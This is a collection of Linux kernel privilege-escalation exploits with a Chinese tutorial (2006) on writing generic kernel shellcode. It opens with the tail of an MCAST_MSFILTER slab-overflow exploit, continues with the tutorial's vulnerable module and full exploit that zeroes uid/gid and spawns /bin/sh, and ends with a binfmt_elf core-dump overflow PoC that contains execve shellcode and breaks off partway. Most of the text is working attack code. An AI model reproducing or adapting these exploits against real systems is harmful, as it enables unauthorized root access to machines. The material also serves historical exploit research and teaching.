addr[2] != uid || addr[3] != uid
)
addr++;

addr[0] = addr[1] = addr[2] = addr[3] = 0; /* set uids */
addr[4] = addr[5] = addr[6] = addr[7] = 0; /* set gids */
}

void set_root(unsigned int *ts)
{
if((unsigned int*)*ts!=NULL)
ts = (int*)*ts;

int cntr;
for(cntr = 0; cntr <= 512; cntr++, ts++)
if( ts[0] == uid && ts[1] == uid && ts[4] == gid && ts[5] == gid)
ts[0] = ts[1] = ts[4] = ts[5] = 0;
}

int myget_cs()
{
__asm__("movl %cs,%eax\n");
}
int myget_ds()
{
__asm__("movl %ds,%eax\n");
}

/*
* kernel 2.4.x/2.6.x privilege elevator
**/
extern load_highlevel;
__asm__
(
"load_highlevel: \n\t"
"mov $0xffffe000,%eax\n\t"
"and %esp,%eax \n\t"
"pushl %eax \n\t"
"call set_root \n\t"
"pop %eax \n\t"
"cli \n\t"
"movl $user_ds,%eax \n\t"
"pushl (%eax)\n"
"pop %ds \n\t" /* DS */
"pushl %ds \n\t" /* SS */
"pushl $0xc0000000 \n\t" /* ESP */
"pushl $0x246 \n\t" /* EFLAGS */
"movl $user_cs,%eax \n\t" /* CS */
"pushl (%eax) \n\t"
"pushl $shellcode \n\t"
"iret \n\t"
);

int main(int argc, char *argv[])
{
int sock = -1;
int victim_pipe[2] = {-1, -1};
int holderid = -1;
struct group_filter *gsf = NULL; /* &optval */
int optlen, optlen_align;
int nsems;
int pid;
int status;

unsigned int numsrc, full_numsrc, of_numsrc /* overflow numsrc */;
int msize, gsize, i;
struct sockaddr_in *psin;

sys_call_table = (void *) get_sys_call_table();
if (!sys_call_table)
goto err;

sock = socket(PF_INET, SOCK_STREAM, 0);
if (sock == -1) {
perror("socket");
goto err;
}

optlen = sizeof(struct group_filter) +
sizeof(struct sockaddr_storage) * (MY_NUMSRC-1);
optlen_align = fix_slabsize(optlen);
/*
* (kernel-2.4.22)
* ...
* define IP_MSFILTER_SIZE(numsrc) \
* (sizeof(struct ip_msfilter) - sizeof(__u32) \
* + (numsrc) * sizeof(__u32))
*/
numsrc = ((4 - (sizeof(struct ip_msfilter) - 4)))/4 + (SLAB_SIZE - 4)/4;
msize = IP_MSFILTER_SIZE(numsrc);
gsize = GROUP_FILTER_SIZE(numsrc);
printf("numsrc: 0x%x msize: 0x%x gsize: 0x%x optlen: 0x%x\n",
numsrc, msize, gsize, optlen);

if (argc == 2 && !strcmp(argv[1], "-w"))
exit(EXIT_SUCCESS);

gsf = malloc(optlen_align);
if (gsf == NULL) {
perror("malloc");
goto err;
}
memset(gsf, 'A', optlen);

/*
* Prepare
**/
printf("Prepare ...\n");
gsf->gf_numsrc = numsrc;
gsf->gf_interface = 0;
gsf->gf_fmode = 0;
psin = (struct sockaddr_in *) &gsf->gf_group;
psin->sin_family = AF_INET;

for (i = 0; i < MY_NUMSRC; i++) {
psin = (struct sockaddr_in *) &gsf->gf_slist[i];
psin->sin_family = AF_INET;
psin->sin_addr.s_addr = 0x43434343;
}

full_numsrc = (optlen_align - sizeof(struct group_filter))
/ sizeof(gsf->gf_slist[0]) + 1 + 1;
of_numsrc = full_numsrc
- ((SLAB_SIZE - 20 /* sizeof(struct ip_msfilter) */) / 4 + 1);
printf("full_numsrc: %d \toverflow_numsrc: %d\n", full_numsrc, of_numsrc);

for (; i < full_numsrc; i++) {
psin = (struct sockaddr_in *) &gsf->gf_slist[i];
psin->sin_family = AF_INET;
psin->sin_addr.s_addr = 0x44444444;
}
assert(of_numsrc == 3);
psin = (struct sockaddr_in *) &gsf->gf_slist[full_numsrc-of_numsrc-1+3]; /* char *base */
psin->sin_addr.s_addr = (unsigned int) &sys_call_table[__NR_hijack_getroot];

setsockopt(sock, SOL_IP, MCAST_MSFILTER, gsf, optlen_align);
prepare_slab(SLAB_SIZE, -1);
prepare_slab(SLAB_SIZE, 4);

nsems = COMPUTE_NSEMS(SLAB_SIZE);
holderid = semget(IPC_PRIVATE, nsems, IPC_CREAT);
if (holderid == -1) {
perror("semget IPC_NEW");
goto err;
}

if (pipe(victim_pipe) == -1) {
perror("pipe");
goto err;
}

semctl(holderid, 0, IPC_RMID);
printf("Exploiting ...\n");
semctl(holderid, 0, IPC_RMID);
if (setsockopt(sock, SOL_IP, MCAST_MSFILTER, gsf, optlen) == -1)
perror("setsockopt");

/*
* Get root
**/
char *p_load_highlevel = (void *) &load_highlevel;
if (fork() == 0)
{
int cnt;
alarm(1);
cnt = write(victim_pipe[1], &p_load_highlevel, 4);
if (cnt == -1) {
perror("write pipe");
goto err;
}
exit(0);
}
sleep(2);

if ((pid = fork()) == 0) {
configure();
hijack_getroot(0);

printf("Failed to get root!\n");
_exit(-1);
}

while (1) {
if (waitpid(pid, &status, 0) < 0)
break;
}

de_prepare_slab();
free(gsf);
close(sock);

close(victim_pipe[0]);
close(victim_pipe[1]);
return EXIT_SUCCESS;
err:
if (victim_pipe[0] > 0) {
close(victim_pipe[0]);
close(victim_pipe[1]);
}

de_prepare_slab(); /* it's safe */

if (holderid != -1)
semctl(holderid, 0, IPC_RMID);
if (gsf)
free(gsf);
if (sock != -1)
close(sock);
return EXIT_FAILURE;
}

linux内核溢出研究系列(1)--通用shellcode篇

标题: linux内核溢出研究系列(1)--通用shellcode篇

创建: 2006-3-22
修改:2006-3-22
作者:李小军(a1rsupp1y)
---------------------------------------------------------------------------------------------------
目录:
一、简介

二、简单的例子
1)例子代码
2)利用代码

三、shellcode扩展
1)模式
2)通用思路
3)通用实现
四、参考资源
五、附录
六、感谢
--------------------------------------------------------------------------------------------------


一、简介
linux内核溢出凸显严重,利用代码的编写和普通溢出相比,难度大了很多。
几乎每一个经典的内核漏洞都有一个非常经典的利用代码值得大家深入学习。
目前可以借鉴的学习文档基本上都是英文的,于是决定对linux内核溢出利用代
码的编写进行全盘的学习。这份文档就是一个学习的过程,记录下来,希望能
和大家共同进步。

二、简单的例子
首先,研究的目标是2.6的内核版本,然后再扩展到2.4内核。我们先从一个简单
的例子代码出发,进行利用代码的编写。我们的测试平台是缺省内核的redhat as4
(2.6.9)和gentoo(2.6.15).
1)例子代码
我们的例子代码先挂载(hook)了一个系统调用,其功能就是把用户空间的数据拷贝
到内核空间,因为没有进行长度检查,导致了一个内核栈溢出。
因为2.6内核下面,没有引出sys_call_table,我们用了一个查找函数(find_systable)来找到
sys_call_table的地址。
例子代码如下:
#include
#include
#include
#include
#include
#define CALL_NR 35

static const void *lower_bound = &kernel_thread;
int *sys_call_table =0xc04eb6c0;
int (*old_call)(int, int);

static inline int looks_good(void **p)
{
if (*p <= (void*)lower_bound || *p >= (void*)p)
return 0;
return 1;
}
/*
* find sys_call_table
*/
int find_systable(void)
{
void **ptr = (void **)&init_mm;
void **limit;

sys_call_table = NULL;

for (limit = ptr + 16 * 1024;
ptr < limit && sys_call_table == NULL; ptr++)
{
int ok = 1;
int i;

for (i = 0; i < 250; i++)
if (!looks_good(ptr + i)) {
ok = 0;
ptr = ptr + i;
break;
}

if (ok) {
if (ptr[__NR_break] != ptr[__NR_ftime])
continue;
sys_call_table = ptr;
break;
}
}

if (sys_call_table == NULL) {
printk("Failed to find address of sys_call_table\n");
return -EIO;
}

printk("Found sys_call_table at 0x%.8x\n", sys_call_table);
return 0;
}

asmlinkage int test(unsigned int len,char * code) {
char buf[256];
//strcpy(buf,code);
memcpy(buf,code,len);

}
asmlinkage int new_call(unsigned int len, char * buf) {
printk("%p\n",current_thread_info());
printk("off:%d\n",(int)(current)-(int)(¤t->uid));
char * code = kmalloc(len, GFP_KERNEL);

if (code ==NULL) goto out;

if (copy_from_user(code, buf, len))
goto out;

test(len,code);
out:
return 0;
}

int init_module(void)
{
int i=find_systable();
printk("[*] vuln loaded!\n");
old_call = sys_call_table[CALL_NR];
sys_call_table[CALL_NR] = new_call;
return 0;
}
void cleanup_module(void)
{
sys_call_table[CALL_NR] = old_call;
printk("[*] vuln unloaded!\n");
}

2)利用代码
针对上面的栈溢出,利用代码也很简单,就是构造超长的数据,然后调用该系统调用来传递
给内核。
利用代码如下:

/* exp.c
*/
#include
#include
#include
#include
#include
#include
#include
#define __NR_new_call 35
static inline _syscall2(int, new_call, unsigned int ,len,char * ,code);
#define NOP 'A'
//===================[ kernel 2.6* privilege elevator ]=================
//globals
int uid, gid;

extern load_highlevel;
__asm__
(
"load_highlevel: \n"
"xor %eax, %eax \n"
"mov $0xffffe000, %eax\n"
"and %esp,%eax \n"
"pushl %eax \n"
"call set_root \n"
"pop %eax \n"
//ret to userspace-2.6.* version
" cli \n"
" pushl $0x7b \n" //DS user selector
" pop %ds \n"
" pushl %ds \n" //SS
" pushl $0xc0000000 \n" //ESP
" pushl $0x246 \n" //EFLAGS
" pushl $0x73 \n" //CS user selector
" pushl $sc \n" //EIP must not be a push /bin/sh shellcode!!
"iret \n"
);

void set_root(unsigned int *ts)
{
if((unsigned int*)*ts!=NULL)
ts = (int*)*ts;
int cntr;
//hope you guys are int aligned
for(cntr = 0; cntr <= 512; cntr++, ts++)
if( ts[0] == uid && ts[1] == uid && ts[4] == gid && ts[5] == gid)
{ ts[0] = ts[1] = ts[4] = ts[5] = 0;
// __asm__("int3");
}

}



char *p[]={"/bin/sh"};
void sc(){
// __asm__("int3");
execve("/bin/sh",p,NULL);
exit(0);
}
//==============================================================
//==============================================================






int main(int argc,char **argv)
{
char code[1024];
unsigned int len;
int i;
uid=getuid();
gid=getgid();
memset(code,NOP,1024);
for(i=0;i<5;i++)
memcpy(code,&load_highlevel,128);

len = 256+8+4+4;
sleep(1);
printf("code addr is:%p\n",&load_highlevel);
*(int *)(code+256+8) = (int)&load_highlevel;//eip

new_call(len,code);

}

内核栈溢出和普通栈溢出的原理是一样的,就是覆盖内核函数的返回地址,从而改
变运行的流程,在内核栈溢出里面,关键就是shellcode的功能,如何实现提升用户
权限以及如何安全返回到用户空间。所以,我们把shellcode部分提取出来进行分析。
__asm__
(
"load_highlevel: \n"
"mov $0xffffe000, %eax\n"
"and %esp,%eax \n"
"pushl %eax \n"
"call set_root \n"
"pop %eax \n"
//ret to userspace-2.6.* version
" cli \n"
" pushl $0x7b \n" //DS user selector
" pop %ds \n"
" pushl %ds \n" //SS
" pushl $0xc0000000 \n" //ESP
" pushl $0x246 \n" //EFLAGS
" pushl $0x73 \n" //CS user selector
" pushl $sc \n" //EIP must not be a push /bin/sh shellcode!!
"iret \n"
);
上面的shellcode首先进行的是权限的提升,把进程信息里面的uid,euid和gid,egid修改为
root权限。2.6内核下面,进程信息的指针是在内核栈-8192的位置的(2.4内核下是整个
进程信息放置在该位置),所以通过"mov $0xffffe000, %eax\n" "and %esp,%eax \n"
就能找到进程信息指针的值,从内核代码我们也能看出来:
028 struct thread_info {
029 struct task_struct *task; /* main task structure */《--我们要获得的值
030 struct exec_domain *exec_domain; /* execution domain */
031 unsigned long flags; /* low level flags */
032 unsigned long status; /* thread-synchronous flags */
033 __u32 cpu; /* current CPU */
034 int preempt_count; /* 0 => preemptable, <0> BUG */
035
036
037 mm_segment_t addr_limit; /* thread address space:
038 0-0xBFFFFFFF for user-thead
039 0-0xFFFFFFFF for kernel-thread
040 */
041 struct restart_block restart_block;
042
043 unsigned long previous_esp; /* ESP of the previous stack in case
044 of nested (IRQ) stacks
045 */
046 __u8 supervisor_stack[0];
047 };
获得进程信息的指针以后,就可以通过搜索里面的uid,euid,gid,egid,并修改为0,从而提升
到root权限。set_root实现的就是搜索修改功能。完成权限提升以后,就要实现安全返回到用户
空间,并获得shell。下面的汇编代码实现此功能:
" cli \n"
" pushl $0x7b \n" //DS user selector
" pop %ds \n"
" pushl %ds \n" //SS
" pushl $0xc0000000 \n" //ESP
" pushl $0x246 \n" //EFLAGS
" pushl $0x73 \n" //CS user selector
" pushl $sc \n" //EIP ,shell函数的地址
"iret \n"

三、shellcode扩展
从前面的shellcode分析我们可以知道此shellcode有多个值是不定值,和系统是相关的,第一个
是内核栈的大小,不同的系统下面,内核栈的大小不一定相同,就会影响到$0xffffe000这个值,
一般系统内核栈大小是8k,就使用$0xffffe000,有些系统下面,内核栈大小是4kb,就是要使用0xfffff000。
第二个不定值是用户DS和用户CS的值,不同的内核版本下面,使用的值不相同。第三个不定值是用户
空间大小,不同的系统下面,内存大小会影响到该值,一般的系统是0xc0000000,但是在高内存(>896MB)
的系统下面,此值就变了。

1)模式
为了写出通用的shellcode,我们首先要确定我们的shellcode模式。
我们的模式:权限提升-》安全返回-》执行shell 在此模式里面,我们要消除不定值,从而实现通用。

2)通用思路
模式确定后,我们的目标就明确了,消除所有的不定值。
a)消除内核栈大小差异
为了消除内核栈的差异,我们要想办法在内核空间里面搜索到这个值。经过一番研究后,我们把目标
确定在了system_call的实现里面,首先,我们来看看system_call的汇编代码:
0xc0102e58 : push %eax
0xc0102e59 : cld
0xc0102e5a : push %es
0xc0102e5b : push %ds
0xc0102e5c : push %eax
0xc0102e5d : push %ebp
0xc0102e5e : push %edi
0xc0102e5f : push %esi
0xc0102e60 : push %edx
0xc0102e61 : push %ecx
0xc0102e62 : push %ebx
0xc0102e63 : mov $0x7b,%edx
0xc0102e68 : movl %edx,%ds
0xc0102e6a : movl %edx,%es
0xc0102e6c : mov $0xffffe000,%ebp 《--我们的目标
0xc0102e71 : and %esp,%ebp
0xc0102e73 : testw $0x1c1,0x8(%ebp)
0xc0102e79 : jne 0xc0102f40
0xc0102e7f : cmp $0x126,%eax
0xc0102e84 : jae 0xc0102fb4
我们不难发现,system_call的实现里面有我们要的值0xffffe000,而且他的模式非常固定,前面是一个mov xx,%edx,
接下两个movl 是固定的。
0xc0102e63 : mov $0x7b,%edx
0xc0102e68 : movl %edx,%ds
0xc0102e6a : movl %edx,%es
0xc0102e6c : mov $0xffffe000,%ebp
这样,我们就能通过搜索内核空间来确定第一个值了。
搜索代码如下:
"movl $task_size,%eax \n" //task_size=kernel space start
"mov (%eax),%eax \n"
//find correct stack bottom in kernel space
"l00p: \n"
"add $0x1,%eax \n"
"mov (%eax),%ebx \n"
"and $0xffff00ff,%ebx\n"
"cmp $0x000000ba,%ebx \n"
"jne l00p\n"
"add $0x4,%eax\n"
"movl (%eax),%edx\n"
"cmpl $0x8eda8e00,%edx\n"
"jne l00p\n"
"add $0x6,%eax\n"
"mov (%eax),%ebx\n"
"test $0xffff0000,%ebx\n"
"jz l00p\n"
"test $0x00000fff,%ebx\n"
"jnz l00p\n"
"mov (%eax), %eax\n" //stack bottom 0xffffe000 etc.
"and %esp,%eax \n"
我们可以发现,在此段搜索代码里面,我们又引人了一个新的不定值,$task_size,这个值我们也能通过计算获得
unsigned val;
task_size = ((unsigned)&val + 1 GB ) / (1 GB) * 1 GB;
这样,我们就消除了第一个差异
b)消除用户DS,CS差异
接着,我们要消除用户DS和CS的差异,我们通过在用户空间直接获取ds和cs的值
int myget_ds()
{

__asm__("movl %ds,%eax\n");
}
user_ds=myget_ds();

然后
" movl $user_ds,%eax \n" //DS user selector
"pushl (%eax)\n"
这样就动态的获取了用户DS的值
c)消除用户空间差异
不断向栈底方向取值,越过栈底的地址访问会导致SIGSEGV 信号,然后利用长跳转回到主流程报告当前值,
自然对应栈底。
3)通用实现
现在,我们已经消除了全部的不定值,完全可以实现一个通用的shellcode了。下面这段shellcode在2.4和2.6内核
下测试通过,完全通用。
//===================[ kernel 2.6* privilege elevator ]===============================
//globals
int uid, gid;
unsigned task_size;
unsigned stack_bottom;
unsigned user_cs,user_ds;
extern load_highlevel;
__asm__
(
"load_highlevel: \n"
"movl $task_size,%eax \n" //task_size=kernel space start
"mov (%eax),%eax \n"
//find correct stack bottom in kernel space
"l00p: \n"
"add $0x1,%eax \n"
"mov (%eax),%ebx \n"
"and $0xffff00ff,%ebx\n"
"cmp $0x000000ba,%ebx \n"
"jne l00p\n"
"add $0x4,%eax\n"
"movl (%eax),%edx\n"
"cmpl $0x8eda8e00,%edx\n"
"jne l00p\n"
"add $0x6,%eax\n"
"mov (%eax),%ebx\n"
"test $0xffff0000,%ebx\n"
"jz l00p\n"
"test $0x00000fff,%ebx\n"
"jnz l00p\n"
"mov (%eax), %eax\n" //stack bottom 0xffffe000 etc.
"and %esp,%eax \n"
"pushl %eax \n"
"call set_root \n"
"pop %eax \n"
//ret to userspace-2.6.* version

" cli \n"
" movl $user_ds,%eax \n" //DS user selector
"pushl (%eax)\n"
" pop %ds \n"
" pushl %ds \n" //SS
" movl $stack_bottom,%eax \n" //ESP
"pushl (%eax) \n"
" pushl $0x246 \n" //EFLAGS
"movl $user_cs,%eax \n" //DS user selector
"pushl (%eax)\n"
" pushl $sc \n" //EIP must not be a push /bin/sh shellcode!!
"iret \n"
);
//========================================================================

四、参考资源
1)http://www.milw0rm.com/exploits/926
2)http://fanqiang.chinaunix.net/program/c++/2002-10-18/2372.shtml
3)http://www.isec.pl/papers/linux_kernel_do_brk.pdf
4)http://www.xfocus.net/projects/Xcon/2002/Xcon2002_alert7_e4gle.pdf

五、附录
1)exp.c
完整的exp代码
/* exp.c
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define kB * 1024
#define MB * 1024 kB
#define GB * 1024 MB

#define __NR_new_call 35
static inline _syscall2(int, new_call, unsigned int ,len,char * ,code);
static char * get_stack_bottom ( void );
#define NOP 'A'

//===================[ kernel 2.6* privilege elevator ]===============================
//globals
int uid, gid;
unsigned task_size;
unsigned stack_bottom;
unsigned user_cs,user_ds;
extern load_highlevel;
__asm__
(
"load_highlevel: \n"
"movl $task_size,%eax \n" //task_size=kernel space start
"mov (%eax),%eax \n"
//find correct stack bottom in kernel space
"l00p: \n"
"add $0x1,%eax \n"
"mov (%eax),%ebx \n"
"and $0xffff00ff,%ebx\n"
"cmp $0x000000ba,%ebx \n"
"jne l00p\n"
"add $0x4,%eax\n"
"movl (%eax),%edx\n"
"cmpl $0x8eda8e00,%edx\n"
"jne l00p\n"
"add $0x6,%eax\n"
"mov (%eax),%ebx\n"
"test $0xffff0000,%ebx\n"
"jz l00p\n"
"test $0x00000fff,%ebx\n"
"jnz l00p\n"
"mov (%eax), %eax\n" //stack bottom 0xffffe000 etc.
"and %esp,%eax \n"
"pushl %eax \n"
"call set_root \n"
"pop %eax \n"
//ret to userspace-2.6.* version

" cli \n"
" movl $user_ds,%eax \n" //DS user selector
"pushl (%eax)\n"
" pop %ds \n"
" pushl %ds \n" //SS
" movl $stack_bottom,%eax \n" //ESP
"pushl (%eax) \n"
" pushl $0x246 \n" //EFLAGS
"movl $user_cs,%eax \n" //DS user selector
"pushl (%eax)\n"
" pushl $sc \n" //EIP must not be a push /bin/sh shellcode!!
"iret \n"
);
//=================================================================================
void configure(void)
{
unsigned val;
task_size = ((unsigned)&val + 1 GB ) / (1 GB) * 1 GB;
printf("task_size:%p\n",task_size);
stack_bottom=(unsigned)get_stack_bottom();
uid=getuid();
gid=getgid();
user_ds=myget_ds();
user_cs=myget_cs();
//printf("%x%x\n",user_cs,user_ds);

}
void set_root(unsigned int *ts)
{
if((unsigned int*)*ts!=NULL)
ts = (int*)*ts;
int cntr;
//hope you guys are int aligned
for(cntr = 0; cntr <= 512; cntr++, ts++)
if( ts[0] == uid && ts[1] == uid && ts[4] == gid && ts[5] == gid)
{ ts[0] = ts[1] = ts[4] = ts[5] = 0;
// __asm__("int3");
}

}

char *p[]={"/bin/sh"};
void sc(){
// __asm__("int3");
execve("/bin/sh",p,NULL);
exit(0);
}
//====================================================================================
//====================================================================================

//**************************************************************************************//
//--------------------------------find stack bottom begin-------------------------------------//
//rip from scz's code
typedef void Sigfunc ( int ); /* for signal handlers */

Sigfunc * signal ( int signo, Sigfunc * func );
static Sigfunc * Signal ( int signo, Sigfunc * func );
static char * get_stack_bottom ( void );
static void segfault ( int signo );

static sigjmp_buf jmpbuf;
static volatile sig_atomic_t canjump = 0;
static Sigfunc *seg_handler;
static Sigfunc *bus_handler; /* for xxxBSD */

Sigfunc * signal ( int signo, Sigfunc * func )
{
struct sigaction act, oact;
act.sa_handler = func;
sigemptyset( &act.sa_mask );
act.sa_flags = 0;
if ( sigaction( signo, &act, &oact ) < 0 )
{
return( SIG_ERR );
}

return( oact.sa_handler );
} /* end of signal */

static Sigfunc * Signal ( int signo, Sigfunc * func ) /* for our signal() funct
ion */
{
Sigfunc * sigfunc;

if ( ( sigfunc = signal( signo, func ) ) == SIG_ERR )
{
exit( EXIT_FAILURE );
}
return( sigfunc );
} /* end of Signal */

static char * get_stack_bottom ( void )
{
volatile char *c; /* for autovar, must be volatile */

seg_handler = Signal( SIGSEGV, segfault );
bus_handler = Signal( SIGBUS, segfault );

c = ( char * )&c;



if ( sigsetjmp( jmpbuf, 1 ) != 0 )

{

Signal( SIGSEGV, seg_handler );
Signal( SIGBUS, bus_handler );
return( ( char * )c );

}

canjump = 1; /* now sigsetjump() is OK */

while ( 1 )
{

*c = *c;
c++;

}

return( NULL );
} /* end of get_stack_bottom */

static void segfault ( int signo )
{
if ( canjump == 0 )
{
return; /* unexpected signal, ignore */
}
canjump = 0;
siglongjmp( jmpbuf, signo ); /* jump back to main, don't return */
} /* end of segfault */

//**************************************************************************************//
//**********************************The end*********************************************//

int myget_cs()
{

__asm__("movl %cs,%eax\n");
}
int myget_ds()
{

__asm__("movl %ds,%eax\n");
}
int main(int argc,char **argv)
{
char code[1024];
unsigned int len;
int i;
//stack_bottom=0x80000000;
configure();
memset(code,NOP,1024);
len = 256+8+4+4;
printf("code addr is:%p\nset_root is:%p\nsc is:%p\n",&load_highlevel,&set_root,&sc);
*(int *)(code+256+8) = (int)&load_highlevel;//eip
*(int *)(code+256+8+4) = (int)&load_highlevel;//eip

new_call(len,code);

}

六、感谢
感谢陈宇(grip2)和梁彬(lb)的讨论和帮助

Linux binfmt_elf core dump buffer overflow exploit

#!/bin/bash
#
####################################################
#
# Linux binfmt_elf core dump buffer overflow (PoC)
# (Kernel-2.4.22)
#
# 2006-04-30
# Written by :
# grip2
# airsupply
#
####################################################

## overflow.c
cat <<> overflow.c
/*
* Written by :
* grip2
* airsupply
*/

#include
#include
#include
#include

#include
#include

#include


int main(int argc, char *argv[])
{
int esp;
struct rlimit rl;
int res;
int i;
char *env[10];
char page[PAGE_SIZE];

__asm__("movl %%esp, %0" : : "m"(esp));
printf("arg_start: %p arg_end: %p esp: %p\n",
argv[0], argv[argc-1]+strlen(argv[argc-1]), esp);

rl.rlim_cur = RLIM_INFINITY;
rl.rlim_max = RLIM_INFINITY;
res = setrlimit(RLIMIT_CORE, &rl);
if (res != 0) {
perror("setrlimit");
goto err;
}

memset(page, 'A', sizeof(page));
page[sizeof(page)-1] = 0;

for (i = 0; i < 9; i++)
env[i] = page;
env[i] = 0;

if (strcmp(argv[0], "SELF2") == 0) {
char *av[] = {"badelf", page, 0};
execve("badelf", av, NULL);
/* execve("test_elf", av, NULL); */
perror("execve: badelf");
goto err;
}


char *av[] = {"SELF2", 0};
execve(argv[0], av, env);

perror("execve self:");
goto err;

return 0;
err:
return 1;
}
__EOF__

## mkbadelf.c
cat <<> mkbadelf.c
/*
* Written by grip2
*/

#include
#include
#include
#include
#include
#include
#include
#include

char sc[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

extern test;
__asm__ (
"test:\n\t"
"cli \n\t"
"hlt \n\t"
"movl \$0xbffff000, %eax \n\t"
// "movl \$0x42, (%eax) \n\t"
"int3 \n\t"
);

int main()
{
#define ENTRY_OFFSET 4096
int fd = -1;
Elf32_Ehdr ehdr;
Elf32_Phdr phdr;
Elf32_Shdr shdr;
int i;
unsigned char code_align[4096];
unsigned char data_align[0x7000];

fd = open("badelf", O_WRONLY|O_CREAT|O_TRUNC, S_IRWXU);
if (fd == -1) {
perror("open badelf");
goto err;
}

memset(&ehdr, 0, sizeof(ehdr));

ehdr.e_ident[EI_MAG0] = 0x7f;
ehdr.e_ident[EI_MAG1] = 'E';
ehdr.e_ident[EI_MAG2] = 'L';
ehdr.e_ident[EI_MAG3] = 'F';
ehdr.e_ident[EI_CLASS] = ELFCLASS32;
ehdr.e_ident[EI_DATA] = ELFDATA2LSB;
ehdr.e_ident[EI_VERSION] = EV_CURRENT;

ehdr.e_type = ET_EXEC ;
ehdr.e_machine = EM_386;
ehdr.e_version = EV_CURRENT;

ehdr.e_ehsize = sizeof(Elf32_Ehdr);
ehdr.e_phentsize = sizeof(Elf32_Phdr);
ehdr.e_shentsize = sizeof(Elf32_Shdr);

ehdr.e_phnum = 2;
ehdr.e_phoff = sizeof(Elf32_Ehdr);
ehdr.e_shnum = 0;
ehdr.e_shoff = 0;

ehdr.e_shstrndx = 0;
ehdr.e_flags = 0;
ehdr.e_entry = 0x08480000 + ENTRY_OFFSET;

write(fd, &ehdr, sizeof(ehdr)); /* Elf header */

phdr.p_type = PT_LOAD;
phdr.p_offset = 0;
phdr.p_vaddr = 0x08480000;
phdr.p_paddr = phdr.p_vaddr;
phdr.p_filesz = ENTRY_OFFSET + sizeof(code_align);
phdr.p_memsz = ENTRY_OFFSET + sizeof(code_align);
phdr.p_flags = PF_R|PF_X|PF_W;
phdr.p_align = 0x1000;

write(fd, &phdr, sizeof(phdr)); /* Phdr header - PT_LOAD */

phdr.p_type = PT_LOAD;
phdr.p_offset = ENTRY_OFFSET + sizeof(code_align);
phdr.p_vaddr = 0xbfff8000;
phdr.p_paddr = phdr.p_vaddr;
phdr.p_filesz =sizeof(data_align);
phdr.p_memsz = sizeof(data_align);
phdr.p_flags = 0;
phdr.p_align = 0x1000;

write(fd, &phdr, sizeof(phdr)); /* Phdr header - PT_LOAD */

lseek(fd, ENTRY_OFFSET, SEEK_SET);
memset(code_align, '\x90', sizeof(code_align));
#if 1
//unsigned char int3 = 0xcc;
//memcpy(code_align, &int3, sizeof(int3));
memcpy(code_align, &test, 32);
#else
memcpy(code_align, sc, sizeof(sc));
#endif
write(fd, code_align, sizeof(code_align)); /* part of TEXT Segment */

memset(data_align, 'A', sizeof(data_align));
lseek(fd, ENTRY_OFFSET + sizeof(code_align), SEEK_SET);
write(fd, data_align, sizeof(data_align)); /* DATA Segment */

close(fd);
return 0;
err:
if (fd != -1)
close(fd);
return -1;
}
__EOF__

## mklcall.c
cat <<> mklcall.c
/*
* Written by :
* grip2
* airsupply
*/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include


#define g__syscall_return(type, res) \
do { \
if ((unsigned long)(res) >= (unsigned long)(-125)) { \
res = -1; \
} \
return (type) (res); \
} while (0)

#define g_syscall3(type,name,type1,arg1,type2,arg2,type3,arg3) \
type g_##name(type1 arg1,type2 arg2,type3 arg3) \
{ \
long __res; \
__asm__ volatile ("int \$0x80" \
: "=a" (__res) \
: "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
"d" ((long)(arg3))); \
g__syscall_return(type,__res); \
}

static inline g_syscall3(int, write, int, fd, const void *, buf, off_t, count)

char sc[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

void exploit_end(void);

struct list_head {
struct list_head *next, *prev;
};

struct task_struct {
/*
* offsets of these are hardcoded elsewhere - touch with care
*/
volatile long state; /* -1 unrunnable, 0 runnable, >0 stopped */
unsigned long flags; /* per process flags, defined below */
int sigpending;
unsigned long addr_limit; /* thread address space:
0-0xBFFFFFFF for user-thead
0-0xFFFFFFFF for kernel-thread
*/
struct exec_domain *exec_domain;
volatile long need_resched;
unsigned long ptrace;

int lock_depth; /* Lock depth */

/*
* offset 32 begins here on 32-bit platforms. We keep
* all fields in a single cacheline that are needed for
* the goodness() loop in schedule().
*/
long counter;
long nice;
unsigned long policy;
void *mm;
int processor;
/*
* cpus_runnable is ~0 if the process is not running on any
* CPU. It's (1 << cpu) if it's running on a CPU. This mask
* is updated under the runqueue lock.
*
* To determine whether a process might run on a CPU, this
* mask is AND-ed with cpus_allowed.
*/
unsigned long cpus_runnable, cpus_allowed;
/*
* (only the 'next' pointer fits into the cacheline, but
* that's just fine.)
*/
struct list_head run_list;
unsigned long sleep_time;

struct task_struct *next_task, *prev_task;
void *active_mm;
struct list_head local_pages;
unsigned int allocation_order, nr_local_pages;

/* task state */
void *binfmt;
int exit_code, exit_signal;
int pdeath_signal; /* The signal sent when the parent dies */
/* ??? */
unsigned long personality;
int did_exec:1;
unsigned task_dumpable:1;
pid_t pid;
pid_t pgrp;
pid_t tty_old_pgrp;
pid_t session;
pid_t tgid;
/* boolean value for session group leader */
int leader;
/*
* pointers to (original) parent process, youngest child, younger sibling,
* older sibling, respectively. (p->father can be replaced with
* p->p_pptr->pid)
*/
struct task_struct *p_opptr, *p_pptr, *p_cptr, *p_ysptr, *p_osptr;
struct list_head thread_group;

/* PID hash table linkage. */
struct task_struct *pidhash_next;
struct task_struct **pidhash_pprev;

struct list_head wait_chldexit; /* for wait4() */
};

static inline void __list_add(struct list_head *new,
struct list_head *prev,
struct list_head *next)
{
next->prev = new;
new->next = next;
new->prev = prev;
prev->next = new;
}

static inline void add_task_list(struct task_struct *head, struct task_struct *tsk)
{
tsk->next_task = head;
tsk->prev_task = head->prev_task;
head->prev_task->next_task = tsk;
head->prev_task = tsk;
}

static inline struct task_struct * get_current(void)
{
struct task_struct *current;
__asm__("andl %%esp,%0; ":"=r" (current) : "0" (~8191UL));
return current;
}

void exploit_start(void) {}
void exploit()
{
__asm__ __volatile__ ("
nop

nop
jmp x1
nop
nop
nop
nop
nop
nop
x1:
cli ## must do
pusha
